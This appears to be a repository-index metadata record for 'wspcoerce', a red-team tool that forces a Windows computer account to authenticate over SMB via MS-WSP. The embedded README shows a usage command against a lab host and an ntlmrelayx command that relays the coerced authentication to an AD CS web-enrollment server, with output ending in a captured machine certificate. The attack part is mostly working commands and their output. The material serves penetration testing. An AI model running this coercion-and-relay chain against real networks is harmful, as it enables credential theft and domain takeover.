{"id":30300291,"url":"https://github.com/redteampentesting/wspcoerce","last_synced_at":"2025-08-17T04:32:51.071Z","repository":{"id":303425918,"uuid":"995359667","full_name":"RedTeamPentesting/wspcoerce","owner":"RedTeamPentesting","description":"wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP","archived":false,"fork":false,"pushed_at":"2025-07-07T14:33:51.000Z","size":12,"stargazers_count":100,"open_issues_count":1,"forks_count":10,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-07-07T15:44:43.236Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RedTeamPentesting.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-06-03T11:10:07.000Z","updated_at":"2025-07-07T14:33:56.000Z","dependencies_parsed_at":"2025-07-07T15:44:46.476Z","dependency_job_id":"f841c0db-403a-428e-8a43-6bbcc15157bb","html_url":"https://github.com/RedTeamPentesting/wspcoerce","commit_stats":null,"previous_names":["redteampentesting/wspcoerce"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RedTeamPentesting/wspcoerce","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RedTeamPentesting%2Fwspcoerce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RedTeamPentesting%2Fwspcoerce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RedTeamPentesting%2Fwspcoerce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RedTeamPentesting%2Fwspcoerce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RedTeamPentesting","download_url":"https://codeload.github.com/RedTeamPentesting/wspcoerce/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RedTeamPentesting%2Fwspcoerce/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":270807431,"owners_count":24649342,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-17T02:00:09.016Z","response_time":129,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-08-17T04:32:16.951Z","updated_at":"2025-08-17T04:32:51.036Z","avatar_url":"https://github.com/RedTeamPentesting.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"`wspcoerce` coerces a Windows computer account via SMB to an arbitrary target.\nBased on [the finding by slemire](https://github.com/slemire/WSPCoerce).\n\n```\n$ wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' \"file:////attacksystem/share\"\nImpacket v0.13.0.dev0+20250408.175013.349160df - Copyright 2023 Fortra\n\n[*] Connected to IPC$\n[*] Opened MsFteWds pipe\n[*] Sent WSP Connect\n[*] Sent WSP Query\n[*] Sent WSP Disconnect\n```\n\n```\n$ ntlmrelayx.py -t \"http://192.0.2.5/certsrv/\" -debug -6 -smb2support --adcs\n[...]\n[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.0.2.115, attacking target http://192.0.2.5\n[*] HTTP server returned error code 200, treating as a successful login\n[*] Authenticating against http://192.0.2.5 as LAB/WIN11VM$ SUCCEED\n[*] SMBD-Thread-8 (process_request_thread): Received connection from 192.0.2.115, attacking target http://192.0.2.5\n[*] HTTP server returned error code 200, treating as a successful login\n[*] Authenticating against http://192.0.2.5 as LAB/WIN11VM$ SUCCEED\n[*] Generating CSR...\n[*] CSR generated!\n[*] Getting certificate...\n[*] GOT CERTIFICATE! ID 17\n[*] Writing PKCS#12 certificate to ./WIN11VM$.pfx\n[*] Certificate successfully written to file\n[*] Skipping user WIN11VM$ since attack was already performed\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredteampentesting%2Fwspcoerce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fredteampentesting%2Fwspcoerce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredteampentesting%2Fwspcoerce/lists"}